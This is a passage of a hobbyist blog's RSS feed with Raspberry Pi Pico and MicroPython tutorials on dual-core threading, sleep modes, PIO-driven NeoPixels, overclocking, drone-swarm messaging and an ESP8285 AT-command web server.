# PID control towards (target_x, y, z)&lt;/pre&gt;&lt;h2&gt;Visualization (Optional)&lt;/h2&gt;&lt;p&gt;Send drone telemetry to a PC or mobile dashboard using MQTT or WebSocket for real-time visualization.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;Security Considerations&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;UDP is not encrypted.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;For more secure systems, switch to TLS over TCP or Wi-Fi Direct with encryption.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;Future Expansions&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use &lt;strong&gt;ESP-NOW&lt;/strong&gt; (ESP32) for a mesh network&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Add &lt;strong&gt;collision avoidance&lt;/strong&gt; using ultrasonic sensors or LiDAR&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use an &lt;strong&gt;AI vision system&lt;/strong&gt; (YOLOv8 on Jetson Nano or Pi 5) for target tracking&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Switch from Pico W to &lt;strong&gt;ESP32-C3&lt;/strong&gt; for faster real-time messaging with BLE + Wi-Fi&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;p&gt;With just a few Raspberry Pi Pico W boards and MicroPython, you can create a basic &lt;strong&gt;drone swarm&lt;/strong&gt; that shares data, coordinates movement, and follows a central leader.&lt;/p&gt;&lt;p&gt;This is just the foundation: from here, you can add AI, object detection, GPS-based positioning, and more advanced coordination algorithms.&lt;/p&gt;&lt;img alt="" src="https://iottechnews.com/wp-content/uploads/2024/10/ai-drone-swarms-artificial-intelligence-drones-military-uav-defence-defense-research-report-study.jpg" style="height:409px; width:622px"&gt;</description>
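The follower above parses `x,y,z,CMD` strings, and the offset snippet shifts the target behind the leader. That logic can be pulled into small pure-Python helpers (hypothetical names) so it can be tested on a PC before flashing the Pico W:

```python
def parse_leader_msg(msg):
    """Parse an 'x,y,z,CMD' broadcast payload into floats plus the command."""
    x, y, z, cmd = msg.split(',')
    return float(x), float(y), float(z), cmd

def follower_target(leader_pos, offset=(-5.0, 0.0, 0.0)):
    """Target position = leader position plus a fixed trailing offset
    (default: stay 5 meters behind on the X axis)."""
    return tuple(p + o for p, o in zip(leader_pos, offset))

x, y, z, cmd = parse_leader_msg("10,20,5,FOLLOW")
print(cmd, follower_target((x, y, z)))  # FOLLOW (5.0, 20.0, 5.0)
```

In `follower.py`, the body of `listen()` would call these helpers and hand the resulting target to whatever PID/motor layer the drone uses.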
<category>Raspberry Pi Pico</category>
<guid isPermaLink="true">https://asky.uk/79/creating-swarm-drones-with-raspberry-pico-and-micropython</guid>
<pubDate>Tue, 15 Jul 2025 19:40:26 +0000</pubDate>
</item>
<item>
<title>Useful Tips and Tricks for the Raspberry Pi Pico - Part 2</title>
<link>https://asky.uk/78/useful-tips-and-tricks-for-the-raspberry-pi-pico-part-2</link>
<description>&lt;h2&gt;4. &lt;strong&gt;Debugging with SWD&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;For advanced debugging, use the Pico’s Serial Wire Debug (SWD) interface. Connect an SWD debugger (like another Pico or a dedicated debugger) to the SWDIO and SWCLK pins. This allows you to step through C/C++ code or inspect memory in real-time.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Install OpenOCD and a compatible IDE like VS Code with the Cortex-Debug extension for a smooth debugging experience.&lt;/p&gt;&lt;h2&gt;5. &lt;strong&gt;Overclocking for Performance&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The RP2040 can be overclocked beyond its default 125 MHz for performance-intensive tasks. In MicroPython, adjust the clock speed with:&lt;/p&gt;&lt;pre&gt;import machine

machine.freq(200000000)  # Set to 200 MHz
print(machine.freq())     # Confirm the new frequency&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Overclocking increases power consumption and heat, so test thoroughly and ensure proper cooling.&lt;/p&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;p&gt;These tips—leveraging dual cores, managing power, using PIO, debugging with SWD, and overclocking—can significantly enhance your Raspberry Pi Pico projects. Experiment with these techniques to unlock the full potential of this tiny yet powerful microcontroller!&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://thepihut.com/cdn/shop/articles/Raspberry-Pi-Pico-getting-started_1.jpg" style="height:545px; width:1000px"&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
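To see whether overclocking actually helps a given task, it is worth benchmarking before and after changing `machine.freq()`. A rough timing harness (plain Python; on the Pico you would typically use `time.ticks_ms()`/`time.ticks_diff()` instead of `time.monotonic()`, and the workload is just a stand-in):

```python
import time

def benchmark(fn, repeats=5):
    """Return the best-of-N wall-clock time for fn(), in milliseconds."""
    best = float("inf")
    for _ in range(repeats):
        t0 = time.monotonic()
        fn()
        best = min(best, (time.monotonic() - t0) * 1000)
    return best

def workload():
    # A CPU-bound toy task whose runtime should scale with clock speed.
    s = 0
    for i in range(100000):
        s += i * i
    return s

print("workload: %.1f ms" % benchmark(workload))
```

Run it once at the default 125 MHz and again after `machine.freq(200000000)`; the ratio of the two timings shows the real gain for your workload.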
<category>Raspberry Pi Pico</category>
<guid isPermaLink="true">https://asky.uk/78/useful-tips-and-tricks-for-the-raspberry-pi-pico-part-2</guid>
<pubDate>Mon, 14 Jul 2025 21:36:57 +0000</pubDate>
</item>
<item>
<title>Useful Tips and Tricks for the Raspberry Pi Pico</title>
<link>https://asky.uk/77/useful-tips-and-tricks-for-the-raspberry-pi-pico</link>
<description>&lt;p&gt;The Raspberry Pi Pico is a versatile and affordable microcontroller that opens up a world of possibilities for hobbyists and developers. Here are a few practical tips and tricks to help you get the most out of your Raspberry Pi Pico.&lt;/p&gt;&lt;h2&gt;1. &lt;strong&gt;Dual-Core Programming with MicroPython&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The Raspberry Pi Pico's RP2040 chip has two cores, which you can utilize for parallel tasks. In MicroPython, you can run separate functions on each core using the _thread module. For example, one core can handle sensor readings while the other manages a display.&lt;/p&gt;&lt;pre&gt;import _thread
import time

def core1_task():
    while True:
        print("Running on Core 1")
        time.sleep(1)

def core0_task():
    while True:
        print("Running on Core 0")
        time.sleep(1)

_thread.start_new_thread(core1_task, ())
core0_task()&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Ensure shared resources (like GPIO pins) are managed carefully to avoid conflicts between cores.&lt;/p&gt;&lt;h2&gt;2. &lt;strong&gt;Power-Saving with Sleep Modes&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;To save power in battery-powered projects, use the Pico’s sleep modes. You can put the Pico into a low-power state using MicroPython’s machine.lightsleep() or machine.deepsleep(). For example:&lt;/p&gt;&lt;pre&gt;import machine
import time

# Enter light sleep for 5 seconds
machine.lightsleep(5000)&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Use deep sleep for ultra-low power consumption, but note that it resets the program unless you save state to RTC memory.&lt;/p&gt;&lt;h2&gt;3. &lt;strong&gt;Using PIO for Custom Protocols&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The Pico’s Programmable Input/Output (PIO) system is a powerful feature for creating custom communication protocols or handling precise timing. For instance, you can use PIO to drive WS2812B (NeoPixel) LEDs without taxing the CPU.&lt;/p&gt;&lt;pre&gt;from machine import Pin
from rp2 import PIO, StateMachine, asm_pio

@asm_pio(sideset_init=PIO.OUT_LOW, out_shiftdir=PIO.SHIFT_LEFT, autopull=True, pull_thresh=24)
def ws2812():
    T1 = 2
    T2 = 5
    T3 = 3
    wrap_target()
    label("bitloop")
    out(x, 1)               .side(0)    [T3 - 1]
    jmp(not_x, "do_zero")   .side(1)    [T1 - 1]
    jmp("bitloop")          .side(1)    [T2 - 1]
    label("do_zero")
    nop()                   .side(0)    [T2 - 1]
    wrap()

# Example: Send RGB data to a NeoPixel
sm = StateMachine(0, ws2812, freq=8000000, sideset_base=Pin(0))
sm.active(1)
sm.put(0x00FF00, 8)  # one GRB pixel (green); shift left 8 so the top 24 bits are clocked out&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Study the RP2040 datasheet for PIO instructions to create custom protocols like I2S or custom serial interfaces.&lt;/p&gt;</description>
<category>Raspberry Pi Pico</category>
<guid isPermaLink="true">https://asky.uk/77/useful-tips-and-tricks-for-the-raspberry-pi-pico</guid>
<pubDate>Mon, 14 Jul 2025 21:36:12 +0000</pubDate>
</item>
<item>
<title>Welcome to Asky AI - Raspberry Pi 2 POWER</title>
<link>https://asky.uk/76/welcome-to-asky-ai-raspberry-pi-2-power</link>
<description>&lt;p&gt;I’m learning backend dev and built this little AI web app as a project. It’s called Asky Bot, and it generates HTML/CSS from descriptions using OpenAI.&lt;/p&gt;&lt;p&gt;Link: &lt;a target="_blank" rel="nofollow" href="https://asky.uk/askyai"&gt;https://asky.uk/askyai&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Technologies:&lt;/p&gt;&lt;p&gt;Flask + Jinja2&lt;br&gt;DispatcherMiddleware for path management&lt;br&gt;Custom CSS, no JS frameworks&lt;br&gt;Raspberry Pi 2 hosting&lt;br&gt;If you’re learning Flask or AI integration, happy to share tips or code.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://i.ibb.co/PZcsKqDL/Screenshot-2025-07-18-at-07-26-45-Asky-AI-Home.png" style="height:192px; width:660px"&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/76/welcome-to-asky-ai-raspberry-pi-2-power</guid>
<pubDate>Sun, 13 Jul 2025 21:46:32 +0000</pubDate>
</item>
<item>
<title>Creating a WiFi-Connected Web Server with ESP8285 and MicroPython?</title>
<link>https://asky.uk/75/creating-wifi-connected-web-server-with-esp8285-micropython</link>
<description># **Creating a WiFi-Connected Web Server with ESP8285 and MicroPython**&lt;br /&gt;
&lt;br /&gt;
## **Introduction** &amp;nbsp;&lt;br /&gt;
In the world of IoT (Internet of Things), connecting a microcontroller to WiFi and hosting a small web page is a fundamental skill. This guide will walk you through setting up an **ESP8285** (a WiFi-enabled microcontroller) with **MicroPython** to create a simple web server. By the end, you’ll have a device that connects to WiFi and serves a web page displaying real-time data.&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **1. Hardware and Software Requirements**&lt;br /&gt;
### **Hardware Needed:**&lt;br /&gt;
- **ESP8285 Module** (an ESP8266 variant with built-in flash)&lt;br /&gt;
- **RP2040 (Raspberry Pi Pico)** or another microcontroller with UART support&lt;br /&gt;
- **USB-to-Serial Adapter** (if not using a dev board)&lt;br /&gt;
- **Breadboard &amp;amp; Jumper Wires** (for connections)&lt;br /&gt;
- **3.3V Power Supply** (ESP modules are not 5V tolerant!)&lt;br /&gt;
&lt;br /&gt;
### **Software Needed:**&lt;br /&gt;
- **MicroPython Firmware** (flashed on the microcontroller)&lt;br /&gt;
- **Thonny IDE / VS Code with Pico-W-Go** (for coding)&lt;br /&gt;
- **AT Command Firmware** (if using ESP8285 in AT command mode)&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **2. Connecting the ESP8285 to WiFi**&lt;br /&gt;
### **Step 1: Wiring the Hardware**&lt;br /&gt;
Connect the ESP8285 to your microcontroller (RP2040) as follows:&lt;br /&gt;
&lt;br /&gt;
| **ESP8285 Pin** | **RP2040 Pin** |&lt;br /&gt;
|----------------|---------------|&lt;br /&gt;
| TX | RX (GP1) |&lt;br /&gt;
| RX | TX (GP0) |&lt;br /&gt;
| VCC | 3.3V |&lt;br /&gt;
| GND | GND |&lt;br /&gt;
&lt;br /&gt;
### **Step 2: Sending AT Commands**&lt;br /&gt;
The ESP8285 uses **AT commands** for WiFi configuration. Here’s how to connect it to a network:&lt;br /&gt;
&lt;br /&gt;
```python&lt;br /&gt;
from machine import UART, Pin&lt;br /&gt;
import time&lt;br /&gt;
&lt;br /&gt;
uart = UART(0, baudrate=115200, tx=Pin(0), rx=Pin(1)) &amp;nbsp;# UART0 on GPIO0 (TX) and GPIO1 (RX)&lt;br /&gt;
&lt;br /&gt;
def send_at_command(cmd, timeout=2000):&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;&amp;gt;&amp;gt;&amp;quot;, cmd)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uart.write(cmd + &amp;quot;\r\n&amp;quot;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;start = time.ticks_ms()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response = &amp;quot;&amp;quot;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;while time.ticks_diff(time.ticks_ms(), start) &amp;lt; timeout:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if uart.any():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response += uart.read().decode()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if &amp;quot;OK&amp;quot; in response or &amp;quot;ERROR&amp;quot; in response:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;&amp;lt;&amp;lt;&amp;quot;, response)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return response&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;Timeout:&amp;quot;, response)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return response&lt;br /&gt;
&lt;br /&gt;
# Connect to WiFi&lt;br /&gt;
send_at_command(&amp;#039;AT+CWMODE=1&amp;#039;) &amp;nbsp;# Set to Station mode&lt;br /&gt;
send_at_command(&amp;#039;AT+CWJAP=&amp;quot;YourWiFiSSID&amp;quot;,&amp;quot;YourPassword&amp;quot;&amp;#039;, timeout=10000) &amp;nbsp;# Join network&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
**Expected Output:** &amp;nbsp;&lt;br /&gt;
```&lt;br /&gt;
&amp;gt;&amp;gt; AT+CWJAP=&amp;quot;YourWiFiSSID&amp;quot;,&amp;quot;YourPassword&amp;quot;&lt;br /&gt;
&amp;lt;&amp;lt; WIFI CONNECTED&lt;br /&gt;
&amp;lt;&amp;lt; WIFI GOT IP&lt;br /&gt;
&amp;lt;&amp;lt; OK&lt;br /&gt;
```&lt;br /&gt;
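Off-device, the OK/ERROR terminator logic inside `send_at_command` can be exercised with a fake UART. This is a hedged sketch: `FakeUART`, `read_response`, and the canned chunks are illustrative test doubles, not captured from a real module.

```python
# Off-device sketch of the send_at_command terminator logic.
# FakeUART and its canned chunks are illustrative test doubles.
class FakeUART:
    def __init__(self, chunks):
        self.chunks = list(chunks)

    def any(self):
        # Number of buffered chunks still waiting to be read
        return len(self.chunks)

    def read(self):
        return self.chunks.pop(0)

def read_response(uart):
    # Accumulate bytes until the module reports OK or ERROR (timeout omitted here)
    response = ''
    while uart.any():
        response += uart.read().decode()
        if 'OK' in response or 'ERROR' in response:
            return response
    return response

uart = FakeUART([b'WIFI CONNECTED\r\n', b'WIFI GOT IP\r\n', b'OK\r\n'])
print(read_response(uart))
```

The same loop structure runs unchanged on the RP2040, with the real `machine.UART` object in place of the fake.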
&lt;br /&gt;
### **Step 3: Verify Connection**&lt;br /&gt;
Check the assigned IP address:&lt;br /&gt;
```python&lt;br /&gt;
ip_response = send_at_command(&amp;quot;AT+CIFSR&amp;quot;)&lt;br /&gt;
print(&amp;quot;IP Address:&amp;quot;, ip_response.split(&amp;#039;STAIP,&amp;quot;&amp;#039;)[1].split(&amp;#039;&amp;quot;&amp;#039;)[0])&lt;br /&gt;
```&lt;br /&gt;
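The `STAIP` extraction above can be checked in plain Python; the sample response text below is illustrative, not captured from a device.

```python
# Plain-Python check of the STAIP parsing used above.
# The sample AT+CIFSR response text is illustrative.
sample = 'AT+CIFSR\r\n+CIFSR:STAIP,"192.168.1.100"\r\nOK\r\n'
ip = sample.split('STAIP,"')[1].split('"')[0]
print('IP Address:', ip)
```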
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **3. Creating a Basic Web Server**&lt;br /&gt;
### **Step 1: Start a TCP Server**&lt;br /&gt;
The ESP8285 can host a simple web server on **port 80** (or another port if needed).&lt;br /&gt;
&lt;br /&gt;
```python&lt;br /&gt;
send_at_command(&amp;#039;AT+CIPMUX=1&amp;#039;) &amp;nbsp;# Enable multiple connections&lt;br /&gt;
send_at_command(&amp;#039;AT+CIPSERVER=1,80&amp;#039;) &amp;nbsp;# Start server on port 80&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
### **Step 2: Handle HTTP Requests**&lt;br /&gt;
When a browser connects, the ESP8285 receives a request like:&lt;br /&gt;
```&lt;br /&gt;
GET / HTTP/1.1&lt;br /&gt;
Host: 192.168.1.100&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
We respond with a simple HTML page:&lt;br /&gt;
```python&lt;br /&gt;
def handle_request():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;html = &amp;quot;&amp;quot;&amp;quot;HTTP/1.1 200 OK&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!DOCTYPE html&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;head&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;title&amp;gt;ESP8285 Web Server&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/head&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;h1&amp;gt;Hello from ESP8285!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;p&amp;gt;IP: {ip}&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;p&amp;gt;Signal: {rssi} dBm&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;while True:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if uart.any():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;data = uart.read().decode()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if &amp;quot;+IPD,&amp;quot; in data: &amp;nbsp;# New connection&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;conn_id = data.split(&amp;#039;+IPD,&amp;#039;)[1].split(&amp;#039;,&amp;#039;)[0]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;ip = send_at_command(&amp;quot;AT+CIFSR&amp;quot;).split(&amp;#039;STAIP,&amp;quot;&amp;#039;)[1].split(&amp;#039;&amp;quot;&amp;#039;)[0]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;rssi = send_at_command(&amp;quot;AT+CWJAP?&amp;quot;).split(&amp;#039;,&amp;#039;)[-1].replace(&amp;#039;&amp;quot;&amp;#039;,&amp;#039;&amp;#039;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response = html.format(ip=ip, rssi=rssi)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;send_at_command(f&amp;#039;AT+CIPSEND={conn_id},{len(response)}&amp;#039;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;time.sleep(1) &amp;nbsp;# Crude wait for the CIPSEND prompt before sending data&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uart.write(response)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;send_at_command(f&amp;#039;AT+CIPCLOSE={conn_id}&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
handle_request()&lt;br /&gt;
```&lt;br /&gt;
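The connection-id extraction from a `+IPD` notification can be checked in plain Python; the sample payload below is illustrative.

```python
# Plain-Python check of the connection-id extraction from a +IPD notification.
# Notification format: +IPD,id,length:payload
def parse_conn_id(data):
    return data.split('+IPD,')[1].split(',')[0]

sample = '\r\n+IPD,0,87:GET / HTTP/1.1\r\nHost: 192.168.1.100\r\n'
print(parse_conn_id(sample))
```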
&lt;br /&gt;
### **Step 3: Access the Web Page**&lt;br /&gt;
Open a browser and enter:&lt;br /&gt;
```&lt;br /&gt;
http://[ESP_IP]&lt;br /&gt;
```&lt;br /&gt;
Example: `http://192.168.1.100`&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **4. Troubleshooting Common Issues**&lt;br /&gt;
### **1. No WiFi Connection?**&lt;br /&gt;
- Check power supply (3.3V only!)&lt;br /&gt;
- Verify SSID/password&lt;br /&gt;
- Ensure the ESP8285 is in **Station Mode** (`AT+CWMODE=1`)&lt;br /&gt;
&lt;br /&gt;
### **2. Web Page Not Loading?**&lt;br /&gt;
- Ensure the server is running (`AT+CIPSERVER=1,80`)&lt;br /&gt;
- Check if another service (like Apache) is blocking port 80&lt;br /&gt;
- Test with `curl`:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;```bash&lt;br /&gt;
&amp;nbsp;&amp;nbsp;curl http://192.168.1.100&lt;br /&gt;
&amp;nbsp;&amp;nbsp;```&lt;br /&gt;
&lt;br /&gt;
### **3. Slow Response?**&lt;br /&gt;
- Increase UART baud rate (`AT+UART_DEF=115200,8,1,0,0`)&lt;br /&gt;
- Reduce HTML size (avoid large files)&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **5. Enhancing the Web Server**&lt;br /&gt;
### **1. Adding Dynamic Data**&lt;br /&gt;
You can display sensor data (e.g., temperature):&lt;br /&gt;
```python&lt;br /&gt;
html = &amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;lt;p&amp;gt;Temperature: {temp}°C&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
response = html.format(temp=read_sensor())&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
### **2. Adding Interactive Buttons**&lt;br /&gt;
Use HTML forms to control GPIOs:&lt;br /&gt;
```html&lt;br /&gt;
&amp;lt;form action=&amp;quot;/led&amp;quot; method=&amp;quot;GET&amp;quot;&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;button name=&amp;quot;state&amp;quot; value=&amp;quot;on&amp;quot;&amp;gt;Turn LED ON&amp;lt;/button&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;button name=&amp;quot;state&amp;quot; value=&amp;quot;off&amp;quot;&amp;gt;Turn LED OFF&amp;lt;/button&amp;gt;&lt;br /&gt;
&amp;lt;/form&amp;gt;&lt;br /&gt;
```&lt;br /&gt;
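When the form above is submitted, the button value arrives in the request line as a query string. A plain-Python sketch of extracting it (the request line is illustrative):

```python
# Extracting the state value the GET form above submits.
# The request line below is an illustrative sample.
request_line = 'GET /led?state=on HTTP/1.1'
path = request_line.split(' ')[1]      # '/led?state=on'
query = path.split('?')[1]             # 'state=on'
state = query.split('=')[1]
print(state)
```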
&lt;br /&gt;
### **3. Using CSS for Better UI**&lt;br /&gt;
Embed styles for a modern look:&lt;br /&gt;
```html&lt;br /&gt;
&amp;lt;style&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;body { font-family: Arial; margin: 20px; }&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;.card { background: #f5f5f5; padding: 15px; border-radius: 5px; }&lt;br /&gt;
&amp;lt;/style&amp;gt;&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **Conclusion**&lt;br /&gt;
By following this guide, you’ve learned how to:&lt;br /&gt;
✅ Connect an **ESP8285 to WiFi** using AT commands &amp;nbsp;&lt;br /&gt;
✅ Create a **basic web server** in MicroPython &amp;nbsp;&lt;br /&gt;
✅ Serve **dynamic HTML content** &amp;nbsp;&lt;br /&gt;
✅ Troubleshoot common issues &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
This setup is perfect for **IoT dashboards, sensor monitoring, or remote device control**. For more advanced projects, consider using **WebSockets** or **MQTT** for real-time updates.&lt;br /&gt;
&lt;br /&gt;
### **Next Steps**&lt;br /&gt;
- Try adding **authentication** (`AT+CWSAP`)&lt;br /&gt;
- Experiment with **HTTPS** (requires TLS support)&lt;br /&gt;
- Integrate with **cloud services** (AWS IoT, Blynk)&lt;br /&gt;
&lt;br /&gt;
Happy coding! </description>
<category>Raspberry Pi Pico</category>
<guid isPermaLink="true">https://asky.uk/75/creating-wifi-connected-web-server-with-esp8285-micropython</guid>
<pubDate>Sun, 06 Apr 2025 10:05:27 +0000</pubDate>
</item>
<item>
<title>Operating system images – Raspberry Pi</title>
<link>https://asky.uk/72/operating-system-images-raspberry-pi</link>
